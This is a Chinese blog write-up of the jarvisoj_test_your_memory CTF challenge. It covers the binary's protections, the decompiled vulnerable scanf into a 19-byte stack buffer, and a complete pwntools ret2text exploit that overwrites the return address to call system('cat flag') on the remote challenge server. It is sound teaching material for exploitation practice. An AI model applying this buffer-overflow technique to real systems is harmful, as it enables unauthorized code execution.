加载头像

jarvisoj_test_your_memory

Ubuntu16

0x01

checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/jarvisoj_test_your_memory/memory'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled			//栈不可执行
    PIE:      No PIE (0x8048000)

IDA

mem_test()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int __cdecl mem_test(char *s2)
{
  int result; // eax
  char s[19]; // [esp+15h] [ebp-13h] BYREF

  memset(s, 0, 0xBu);
  puts("\nwhat???? : ");
  printf("0x%x \n", hint);
  puts("cff flag go go go ...\n");
  printf("> ");
  __isoc99_scanf("%s", s);
  if ( !strncmp(s, s2, 4u) )
    result = puts("good job!!\n");
  else
    result = puts("cff flag is failed!!\n");
  return result;
}

发现系统调用

1
2
3
4
int __cdecl win_func(char *command)
{
  return system(command);
}

发现可疑字符串

.rodata:080487E0 00000009 C cat flag

0x02

思路 ret2text

1.read()栈溢出执行shell()

0x03

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

context(log_level='debug', os='linux', arch='i386')
io = remote('node4.buuoj.cn', 28548)
# io = process(['./memory'])

cat_flag = 0x80487E0
system = 0x8048440
main = 0x8048677
padding = 0x13 + 0x4
padyload = flat(b'a' * padding, system, main, cat_flag)
io.sendline(padyload)
io.interactive()

评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果
avatar
这有关于运维、开发、后端相关的问题和看法。
相信你可以在这里找到对你有用的知识教程

Zelas2Xerath

技术苑
公告
2024/10/1-跟进上游更新
.NET1AMD1AWX1ChinaSkills2DIY1DirectX1GPU1IDA1KVM1Linux1Markdown1Office1Openwrt8Potplayer1Pwn1Python1RHCE1RHCSA1Redhat2Runtimes4Ryzen1Windows12ansible1cpu3eNSP1hexo2idm1iperf1pip1pwn1python1云计算2显示器1样题2职业技能大赛2虚拟化1装机3超频2配置单2金砖2
归档
网站资讯
文章总数 :
54
建站天数 :
全站字数 :
85.2k
总访客数 :
总访问量 :
最后更新 :
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體